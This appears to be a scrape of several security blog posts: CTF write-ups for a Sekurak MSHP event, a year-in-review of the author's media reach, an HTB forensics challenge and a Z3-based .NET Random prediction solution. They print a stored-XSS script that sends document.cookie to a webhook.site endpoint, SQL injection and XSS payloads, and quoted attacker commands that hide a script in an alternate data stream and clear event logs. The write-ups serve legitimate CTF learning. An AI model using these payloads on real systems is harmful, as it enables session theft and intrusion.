This was my second participation in a CTF event organized by Sekurak team. As before, being part of the MSHP event, it gathered around real pros in the field - but also this time due to Into path addition, challenges were adjusted towards people starting doing this kind of activity.

Not gonna lie, challenges were way more approachable than last time - and I remind you that Oct 2022 was dominated by gynvael who was the only one who submitted all flags.

The organizers said, "beginner friendly, with a twist". And one of those twists took me away from the top 10 😅. I hate DOM-based XSS challenges.

Why the "honorable" mention? Gynvael decided to not participate in the event (he submitted 5/9 flags in the first 25 minutes of the event) to not take the money price from others. And maybe what's more important, because we had design flaws in challenges 1 and 7 - he helped resolve them so we can all complete them during this CTF.

And yeah, that's me:

Challenge 1: my guestbook

Someone wrongly implemented a security mechanism of cookies. Try to receive it, and then... see what needs to be done.
UPDATE:
Admin logs in every full hour! Also, there is also new hint!

Simple submit form with no validation at all. From the hint in the challenge description, it is clear that you have to perform a Stored XSS attack that will send the admin cookies to the endpoint you control (or at least can read incoming requests from). If you want to read in detail about that method, please refer to the Toy Workshop writeup.

Because server that is running a challenge has access to the Internet, it was easier this time because I could use a webhook.site service.

I've determined that only thing I have to do is to make a POST request to `http://ctf.securitum.ninja/ctf1/` and just wait for the cookies (with flag) to arrive.

var q = "<script>fetch('https://webhook.site/76ed31cc-0a98-47e5-8186-****f345****/flag', {method:'POST', body: document.cookie});</script>";

fetch("http://ctf.securitum.ninja/ctf1/", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "message="+q,
  "method": "POST"
});

In the meantime, I started solving other challenges. When the time comes, I've noticed a matching response.

During the CTF organizer come to realization that the solution is a bit too complicated for this kind of event (no solves), so he made a change skipping the "one" step in decyphering the flag. Final version of the challenge is described here.

The initial one with more details regarding the fun backstory is at the end of the article :).

flag=MSHP_%7BU0d3UD03WkAmakpjVnoj%7D; msg=Oh_WaiT_TheRe_iS_some_ncryption_Here

After a simple URL decoding: MSHP_{U0d3UD03WkAmakpjVnoj}. That didn't work so I've tried decoding it from base64 and that was a hit.

Challenge 2: login inject0r

Do you remember the good 0l' days where noone knew about UNION SELECT or TIME statements? Get back to r00ts with this twisted easy SQL injection.

Basic SQL Injection - with a twist, becasue

and Adam apparently did exactly what he was told to do. Injection ' or 1=1 -- doesn't work, but ' OR 2=2 -- is 😉.

Then simply reversing the string in python '}1#7m+UvR8Wr*g6@{_PHSM'[::-1].

Challenge 3: steganoBuster.py

Find the hidden message in pic. But how? I don't know, maybe this server is not about steganography?

Steganography. I love forensics challenges so I got right to it. Downloaded the gigachad-like cock version of Sekurak logo. Then in the source of the page:

And the email.html itself

We've got the Python code that was used to hide a message in the image. Shortly describing what the code does:

1. Decode the message to binary representation (each char to int, then to binary)

2. Reads the image pixels' RBG values column by column.

3. For each R, G, B value encode single bit of message.

4. End when message is fully written.

5. Write image output to file.

The key to notice was: what hiding algorithm does is literally zeroing the last bit of R/G/B value and setting it to the value we need (nth bit of encoded flag).

So knowing that, we can read the message simply be reading the last bits of RGB values of the out.png pixels.

def decrypt(image_path, maxMessageSize):
    maxMessageSize *= 8
    bits = []
    msg_index = 0
    img = Image.open(image_path)
    pixels = img.load()
    for x in range(img.width):
        for y in range(img.height):
            # get RGB of pixel
            pixel = list(pixels[x, y])
            for n in range(3):
                if msg_index < maxMessageSize:
                    # get the flag bit and store
                    bits.append(str(pixel[n] & 1))
                    msg_index += 1
            if msg_index >= maxMessageSize:
                break
        if msg_index >= maxMessageSize:
            break
    bitsString = ''.join(bits)
    print(bitsString);

Slap output to the CyberChef

Challenge 4: $reverseme, harry

"He Who Must Not Be Xored" is ummaterialized! If you want him to regain his strength, you must obtain his soul parts and try to figure out the mystery_key.

First, we had to acquire the binary wget http://ctf.securitum.ninja/ctf4/new and do some fingerprinting.

On the bottom we can see some base64 encoded strings. Let's fire up ghidra (there is a very informative material how to use this tool - link in the resources below).

When inspecting the content of the main function we can discover where the flag is hidden.

So either we can figure out the "key" to have that flag given by the program - or we decode the flag ourselves. I have chosen the latter approach.

#!/usr/bin/python
import base64

def xor_encrypt(str1, key):
    enc = ''
    i=0
    for c in str1:
        enc += chr(c ^ ord(key[i%len(key)]))
        i=i+1
    return enc


if __name__ == "__main__":
    bcode = "ICo7JDoJTzkKO0AdMFAQM1c9JRIKBA=="
    print(xor_encrypt(base64.b64decode(bcode), "mystery_key"))

It does the same thing that is done in the original program - it XORs the "mystery_key" string with the decoded base64 bytes of flag.

Challenge 5: captain forensics

A twin suspicious network packets were captured during a recent incident. Your task is to analyze the packet capture file and retrieve the secret xormunnication!

Download the *.pcap file and open it in the Wireshark. Quick glance through the packets and I can find those 2 that are outstanding from others. Notice that Wireshark already marking them as corrupted/suspicious.

These are DNS packets. If you've heard about DNS Data Exfiltration this should already lit the warning light. In the first packet you can read "Key is 0x42". In the second packet, there is a binary content hidden where DNS (query) should be.

Because in the challenge description you can read about "xormunnication" I'm using all that information to XOR bytes from second packet through 0x42

Challenge 6: crypto.xxe

A cryptographic challenge? Meh, just take the /tmp/flag and then what?

Well, this one is weird, but when you go to the challenge page you got HTTP405 error.

But in Allow response header you can see that POST is allowed.

So you could get a flag by simply sending POST request under the given URL. Notice that I haven't have to use the /tmp/flag for that.. Which bothers me - but hey, as long as it works.

Challenge 7: now that's xxs!

This page is somehow broken. Where's the ?payload?
UPDATE:
If you see a base64 - you are on a right track

Just, don't get me even started... 🥲 This was solvable from the start - but required an exact payload. After the update, it was more forgiving but got significantly more annoying because it started granting you responses like "Alert me!" (when you clearly have an alert in the payload), or "Something is missing" (duh, if the payload were complete I'd have the flag, right?) or "I don't like this tag" (I don't care and I'm not even having any tag there..). Thank you, gynvael 👹 (he was the author of these adjustments to the challenge).

But coming back to the challenge itself. In the page source you can see a hidden form

So the objective here is to submit a payload with a GET request. There was also a hint to use base64 (the site was so great that even reminds you about that couple of times). So initially (I mean, initially then consecutively for the next 3-4 hours, which means I've spent 30-40% of time on this single challenge) I was using the base64 to bypass the XSS filter (using eval(atob(/base64 alert execution/))) instead of encoding whole payload query parameter (?payload=/base 64 whole stuff/).. so the final solution is

http://ctf.securitum.ninja/ctfX/?payload=PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpLz4=

Then I've put that char-train/snake into VSCode, replaced all || with + then slapped that into the python interpreter.

All that is left is decoding base64 to get the flag.

Challenge 8: betrayal

Someone has bypassed our security systems and hacked the FlagHunter bot. Try to ask him to uncover the secret message. Help him retrieve the stolen flag!

That one was fun to do, I even started solving it before the CTF got launched - bot was responding to commands since arrival (8PM day before) so I've got some insights. It was missing /secret response, which is key to move further, and presence of some individual on our Discord server so it was impossible to solve before the launch, but still, it was fun to fiddle with it beforehand.

Betrayal arrival was announced

Then getting the encoded tip and submitting its name.

Challenge 9 (hidden)

You could get bonus 900 points.. simply by reading terms of the event :).

Bonus (challenge 1 battleground)

Ok, so what was about that first challenge? Why it was so hard to do? Well, initially the returned flag was not base64 encoded.

Well, it wasn't any baseXX encoding either. As the author said, to solve the challenge it was required to do some OSINT and discover what exactly cipher was used to encode the flag, then find the exact decoder implementation to decode it. To be honest, that was unintentionally made even harder to do so, becasue the information that would start the research was visible on the page itself. Which was, to remind you, the Stored XSS vulnerable page that [turned into the big battleground](https://sekurak.pl/podsumowanie-mega-sekurak-hacking-party-z-22-maja-2023/) after a while which makes it really discouraging to go there. But if you manage to pass by all the alerts, redirects, obfuscations and Rick Astley, you could see the hint.

So after a quick googling you could find this article here which describes Camellia cipher that was developed by NTT and Mitsubishi.

After googling more you could find many implementations of it (which to use?) - but that's not all. There are many different variations of it

all of which requires key or IV. Which we... well didn't have. After we solved the challenges and Camellia was no longer in a play, Darkdante and me talked a bit about this challenge, and he actually managed to get the flag (outside of the CTF, with a little hint as he stated) by using this exact decoder with camellia-256-cbc variation.

What about key you'll say. Well. It's empty.

Resources

• Previous MSHP CTF

• CyberChef - Swiss Knife for Cyber Enthusiasts

• StegOnline - makes the steganography tasks easier

• Well known PayloadsAllTheThings

• Aboud DNS Tunneling

• GHIDRA for Reverse Engineering | John Hammond

Participation & media presence

2022 was very generous for me. I'm happy that my industry presence is reaching such companies as ECC (one of the largest cyber security technical certification body).

Course: Hands-On JavaScript for Ethical Hacking

The whole first quarter I was spending on creating that course. I was reached out by ECC CodeRed to create a course for them - and I'm happy about it. Pity I don't have any feedback from participants..

Lecture: Improve Your Cybersecurity Skills

The company at which I'm working is having these Tech Talks where people can speak about something they are passionate about, or simply share some technical knowledge during an online session.
You can still watch it on YouTube!

Article in a paper magazine: HTB Cyber Santa CTF: Toy Workshop

I'm really proud of it. This is a Polish version of my write-up I have published here.

HTB: Cyber Apocalypse CTF 2022

HTB: Hack The Boo 2022 CTF

No certificates given for that one :(

Mega Sekurak Hacking Party CTF October 2022

12th place out of 100 participants! That one was the hardest CTF of 2022 (in my opinion).

Securitum: Introduction to IT Security

Reaches

Viewer Discretion : You are about to see the statistics and analytics data. If you are not interested in these, you can skip images and focus on links - see if you missed some good-quality publications!

Blog

Hashnode delivered the Advanced Analytics in February 2022, which I love. It gives more Google Analytics experience where you can find out more about your viewers' demographics.

Altogether, translated to +225% followers gain in comparison to 2022 (was 32).

Most popular articles

1. 🔗 Tools analysis: linPEAS (19 324 views)

2. 🔗 THM Upload Vulnerabilities (3925 views)

3. 🔗 Kasm Workspaces: Spinning up containers on the Raspberry Pi (3517 views)

4. 🔗 HTB Starting Point: Oopsie (3154 views)

5. 🔗 Run Damn Vulnerable Web Application (DVWA) from a Docker container (2064 views)

Instagram

🔔 Followers: 498

This year I've decided to stop counting the Facebook reaches for two reasons: 1) there is too much clutter there to spend time curating posts there and 2) my content was not reaching to the targeted audience.

So, Instagram gained +611% followers since 2021 (was 70).

Top Posts

1. 🔗 IG: Customize your Hack The Box Pwnbox

2. 🔗 IG: Kasm Workspaces: Spinning up containers on the Raspberry Pi

3. 🔗 IG: Brave Rewards integration

4. 🔗 IG: How to dual boot encrypted Kali Linux with Windows 11

5. 🔗 IG: How did I lock myself out of my server, and how did I fix it?

Twitter

🔔 Followers: 282 (+168%)
📣 Total impressions: 100k (+15%)

Here comes some graphs - right now they are not so interesting and valuable for me, but maybe this will change over time.

Top Tweets (quarterly)

Mastodon

🔔 Followers: 39

Here comes the big gun of 2022. Due to Elon Musk's takeover action on Twitter, many people (not only the cybersec industry) moved or at least created accounts on Mastodon. Here is a great article explaining what that platform is:

Here are the statistics so far:

I really like the @infosec.exchange culture and overall experience there.

Patreon

Nothing to say about 2022 - it was a disappointment for me in 2021, but I have an idea of how to make it more interesting for you. But that's for the second half year.

LinkedIn

🔔 Followers: 125

Established in April 2022 - I'm happy with its performance. It reaches my targeted audience and my posts are gaining some interest on the platform, so I'll be keep taking care of that site.

Discord

Again, I wish there was more activity there. Probably it will be if I would include some Discord gaming and giveaway bots - but I don't want to. I wish that to be some more professional space.

At least it is useful when I organize some events, so we can have a neat space to talk together.

Pandora has been using her computer to uncover the secrets of the elusive relic. She has been relentlessly scouring through all the reports of its sightings. However, upon returning from a quick coffee break, her heart races as she notices the Windows Event Viewer tab open on the Security log. This is so strange! Immediately taking control of the situation she pulls out the network cable, takes a snapshot of her machine and shuts it down. She is determined to uncover who could be trying to sabotage her research, and the only way to do that is by diving deep down and following all traces ...

Details

• Category: Forensics

• Difficulty: Medium

• Given: VHDX image file

Exploration

I'm mounting the image file in the Windows using the PowerShell

Mount-DiskImage -Access ReadOnly -ImagePath C:\ws\vm\shared\2023-03-09T132449_PANDORA.vhdx

Taking into consideration that Pandora discovered the Security logs open with the belief that she got hacked, I'm starting with browsing the PowerShell history - and it appears to be a good guess!

$ cat Users/Pandora/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txt

type finpayload > C:\Windows\Tasks\ActiveSyncProvider.dll:hidden.ps1
exit
Get-WinEvent
Get-EventLog -List
wevtutil.exe cl "Windows PowerShell" 
wevtutil.exe cl Microsoft-Windows-PowerShell/Operational
Remove-EventLog -LogName "Windows PowerShell"
Remove-EventLog -LogName Microsoft-Windows-PowerShell/Operational
Remove-EventLog

Here it is visible that some script is being suspiciously hidden in ADS of the regular Windows DLL.

Analysis

We can easily view them in the Command Line

and access its content via PowerShell

This contains executable base64-encoded PowerShell command. By using a such tool as CyberChef I could easily decode the text and after a two-step deobfuscation I could find a flag.

• discussed my take on cybersecurity as a passion that works well together with my job as a developer;

• presented some of the tools and approaches that can be introduced in a daily work to help elevate the software security to the next level;

• done a live SQL Injection example, taken from one of my previous projects.

Description

Prevent user breaches and potential information disclosure by stepping up your cybersecurity game!

The availability of hacking tools and automation scripts significantly lowers the entry barrier for malicious actors to make their presence on the threat scene. And as a result, the market puts more pressure on developers to create solutions with at least basic knowledge of red teaming.

During this tech talk, you will gain a fundamental understanding of cybersecurity and how to improve your software’s quality before handing it to clients.

Organizer: Netcompany

Saved Session

⭐ I'd like to hear your feedback about this TechTalk! ⭐

Resources

• Other Netcompany Global Tech Talks

• SQL Injection Demo Source Code

• Microsoft Learn: Azure Key Vaults

• dotnet user-secrets

• snyk.io

• Git BFG Repo-Cleaner

Articles

• BleepingComputer: Uber hacked, internal systems breached and vulnerability reports stolen

• MFA Fatigue Attacks

Dive Deeper

• OWASP A03:2021 – Injection

• Snyk The Big Fix

• Snyk Streams (OWASP 2021)

• HackThe Box: Cyber Apocalypse 2023 - The Cursed Mission

• Ethical Hacking - where to start?

• Hands-on JavaScript for Ethical Hackers

On October I have participated in MSHP CTF and one of the challenges intrigued me so much that I promised myself to create a separate article on that.

Challenge

Following screen is my recreation of the challenge. Original application made by Michał Bentkowski.

Goal: We are presented with the sequence of 5 random numbers, and we had to guess the sixth one.

Recon

Website

Web source code reveals hidden input containing some kind of validation token.

When sending a request, guid is sent together with the guessed number in GET parameters.

When GUID is invalid or 30 seconds passed:

When we provide wrong number, but within 30s of generation:

There is nothing more to see here, so let's switch to the downloadable part.

Source Code

Application appears to be pretty simple .NET Core MVC Application with Razor pages with a lot of default boilercode. Upon closer inspection following key areas have been identified:

• Index.cshtml

<p>Generated numbers:</p>
<ul>
    @foreach (var num in Model.Random.RandomNumbers)
    {
        <li>@num</li>
    }
</ul>
<form>
    <input type="hidden" name="guid" value="@Model.Random.Guid">
    <label>
        Next number is:
        <input type="number" name="rand">
    </label>
    <button type="submit">Send</button>
</form>

@if (Model.InvalidGuid)
{
    <div class="alert alert-danger">Invalid GUID.</div>
}
@if (Model.InvalidRandom)
{
    <div class="alert alert-danger">Invalid number.</div>
}
@if (Model.Solved)
{
    <div class="alert alert-success">The flag is @Model.Flag</div>
}

• HomeController.cs / Index action

public IActionResult Index(Guid guid, long rand)
{
    var model = new HomeModel
    {
        Random = GenerateRandomModel(),
        Flag = Flag,
        SourceCodeUrl = SourceCodeUrl,
        CacheExpiration = CacheExpiration
    };

    if (guid != default)
    {
        var (invalidGuid, invalidRandom, solved) = CheckSolution(guid, rand);
        model.InvalidGuid = invalidGuid;
        model.InvalidRandom = invalidRandom;
        model.Solved = solved;
    }

    return View(model);
}

• HomeController.cs / Validator

private (bool InvalidGuid, bool InvalidRandom, bool Solved) CheckSolution(Guid guid, long rand)
{
    var validGuid = memoryCache.TryGetValue<RandomModel>(guid, out RandomModel randomModel);

    if (!validGuid)
    {
        return (InvalidGuid: true, InvalidRandom: false, Solved: false);
    }
    if (randomModel.ExpectedRandomNumber == rand)
    {
        return (InvalidGuid: false, InvalidRandom: false, Solved: true);
    }
    return (InvalidGuid: false, InvalidRandom: true, Solved: false);
}

• HomeController.cs / RNG

private RandomModel GenerateRandomModel()
{
    var guid = Guid.NewGuid();
    // The app runs on .NET Core 6
    var r = new System.Random();
    var randomNumbers = new List<long>();
    for (var i = 0; i < NUM_COUNT; ++i)
    {
        randomNumbers.Add(r.NextInt64());
    }
    var expectedRandom = r.NextInt64();
    var randomModel = new RandomModel
    {
        ExpectedRandomNumber = expectedRandom,
        Guid = guid,
        RandomNumbers = randomNumbers,
    };
    memoryCache.Set(guid, randomModel, TimeSpan.FromSeconds(CacheExpiration));
    return randomModel;
}

Here we can see how guid is used to validate answer, timescoping the solution by purging values from cache after 30 seconds.

The most important seems to be comment content in random number generator - which says that the application is running on .NET Core 6. When you search what's so special about randoms in .NET Core 6, you could find that it has more secure and reliable implementation than .NET Framework, in which Random instance is seeded with current clock ticks - and that clock has finite resolution. Which means in .NET Framework, random instances generated within the same clock "cycle" would return the same "random" values.

Upon reading that, I considered this comment is to indicate that we should not bother cracking random by predicting .NET Framework Random.

I started digging up some .NET MVC vulnerabilities. I've discovered a technique called ASP.NET Overposting and tried naively to manipulate HomeModel by forcing it to assume Solved = true. Of course, that was not meant to work because it is a GET request and no one is updating anything.

The trick is, that The app runs on .NET Core 6 comment was actually a nudge, not discouragement.

.NET Core Sources

The first step to solving the challenge was to find how randoms are generated in .NET Core 6. Because source code is open source for couple years now we can easily find that definition on the GitHub or on .NET Source Browser. I strongly recommend second one.

Navigating to the Random class, we can see that they are using an implementation of xoshiro256** algorithm.

//System.Random.Xoshiro256StarStarImpl
internal sealed class XoshiroImpl : ImplBase
{
    private ulong _s0, _s1, _s2, _s3;

    public unsafe XoshiroImpl()
    {
        ulong* ptr = stackalloc ulong[4];
        do
        {
            // Sys.GetNonCryptographicallySecureRandomBytes(..)
            Interop.GetRandomBytes((byte*)ptr, 4 * sizeof(ulong));
            _s0 = ptr[0];
            _s1 = ptr[1];
            _s2 = ptr[2];
            _s3 = ptr[3];
        }
        while ((_s0 | _s1 | _s2 | _s3) == 0); // at least one value must be non-zero
    }

    //...

    public override long NextInt64()
    {
        while (true)
        {
            ulong result = NextUInt64() >> 1;
            if (result != long.MaxValue)
            {
                return (long)result;
            }
        }
    }

    internal ulong NextUInt64()
    {
        ulong s0 = _s0, s1 = _s1, s2 = _s2, s3 = _s3;

        ulong result = BitOperations.RotateLeft(s1 * 5, 7) * 9;
        ulong t = s1 << 17;

        s2 ^= s0;
        s3 ^= s1;
        s1 ^= s2;
        s0 ^= s3;

        s2 ^= t;
        s3 = BitOperations.RotateLeft(s3, 45);

        _s0 = s0;
        _s1 = s1;
        _s2 = s2;
        _s3 = s3;

        return result;
    }
    //...
}

After clearing the class from comments, attributes and members not related to our case (Random.NextInt64()) implementation looks bearable easy.

1. Initialize 4 seeds (64 bits) with random bytes.
2. For each generated random - perform couple bit operations.
3. Shift right result one bit right.

Now, because we know the four consecutive results of that algorithm, we could traceback the operations and that way get the initial 4 values that that instance of the Random class in the challenge got seeded with.

But how to do it?

Z3 Prover

After the competition ended, I've read the following message:

with z3 everything is easy

What is that z3? Quick research and I found that Z3 is a theorem prover from Microsoft Research.

And it is freaking awesome. With it, you can solve simple equations, or more complicated with multiple unknowns (and multiple solutions). You can solve sudoku or nonograms. Einstein quiz. You name it.

It has libraries (bindings, as they are called on GitHub) for

• .NET
• C / C++
• Java
• OCaml
• Python
• Julia
• Web Assembly / TypeScript / JavaScript
• Smalltalk (Pharo / Smalltalk/X)

As far as I know, it has one weakness.

Image source

It is power/logarithm operations.

I have created a little demo when learning how to use Z3 in .NET and it is available here. Official examples are also very comprehensive.

Solution

#!/usr/bin/python
# Original solution by Gynvael (https://gynvael.coldwind.pl/?id=756)
import sys
from z3 import *

# Known, consecutive randoms
values_str = """
1255991502175989513
2593707083834038309
5388191392240667281
6931219874288807879
1406283089239957884
"""

values = [int(x) for x in values_str.split()]
print(values)

# Interop.GetRandomBytes(..)
org_s0 = BitVec("_s0", 64)
org_s1 = BitVec("_s1", 64)
org_s2 = BitVec("_s2", 64)
org_s3 = BitVec("_s3", 64)

# _sN = ptr[N]; N=0..3
_s0 = org_s0
_s1 = org_s1
_s2 = org_s2
_s3 = org_s3

def py_shr(x, k):
  return x >> k

# https://www.geeksforgeeks.org/python3-program-to-rotate-bits-of-a-number/
def rotl(x, n, shr):
    return (x << n) | shr(x, 64 - n) & 0xffffffffffffffff

def NextInt64(_s0, _s1, _s2, _s3, shr = LShR):
    s0 = _s0
    s1 = _s1
    s2 = _s2
    s3 = _s3

    result = (rotl((s1 * 5 & 0xffffffffffffffff), 7, shr) * 9) & 0xffffffffffffffff
    t = (s1 << 17) & 0xffffffffffffffff

    s2 = s2 ^ s0
    s3 = s3 ^ s1
    s1 = s1 ^ s2
    s0 = s0 ^ s3

    s2 = s2 ^ t
    s3 = rotl(s3, 45, shr)

    return shr(result,1), s0, s1, s2, s3

# Create solver and feed it with known values
s = Solver()
result = []
for i in range(5):
  res, _s0, _s1, _s2, _s3 = NextInt64(_s0, _s1, _s2, _s3)
  result.append(res)
  s.add(res == values[i])

# Attempt to solve the equation.
print(s.check())
m = s.model()
print(m)

# Re-run the PRGN for 6 first numbers.
_s0 = m[org_s0].as_long()
_s1 = m[org_s1].as_long()
_s2 = m[org_s2].as_long()
_s3 = m[org_s3].as_long()

print("---")
for i in range(6):
  res, _s0, _s1, _s2, _s3 = NextInt64(_s0, _s1, _s2, _s3, py_shr)
  print(res)
print("---")  # 7824850908443950277

This requires at least some explaination.

0xffffffffffffffff

In Python3 integers are limited by the available memory. This is also a reason why Python is so awesome on working with cryptography challenges that revolves around very large powers. By applying bitwise AND (&) to some big number, we can practically limit the size of it. Think of it as a type casting. Here I'm using 64 ones, limiting the length of the result to 64 bits. Without it, predicting randoms would look like this:

LShR and >>

For that one, I've decided to ask Gynvael why one time he is using LShR and another time >>. Apparently

• >> is an arythmetic shift
• LShR is a logical shift Difference between them
• >> preserves sign (fills with 1 for negative, fills with 0 for positive number)
• LShR does not preserve sign (fills with 0) For example:

But why this is required to shuffle these two operators - I still don't know. Maybe he will explain once again 🥲 (sorry!), this time in the comments.

res,_s0,_s1,_s2,_s3 = NextInt64(_s0,_s1,_s2,_s3)

It's not intuitive to use global variables in Python. For that reason, we can use functional approach with passing arguments through the function.

Finally, we can get answer

Additional Reading

• Mega Sekurak Hacking Party CTF October 2022
• Working with System.Random and threads safely in .NET Core and .NET Framework
• Preventing mass assignment or over posting in ASP.NET Core
• ASP.NET - Overposting/Mass Assignment Model Binding Security
• How does Z3 handle non-linear integer arithmetic?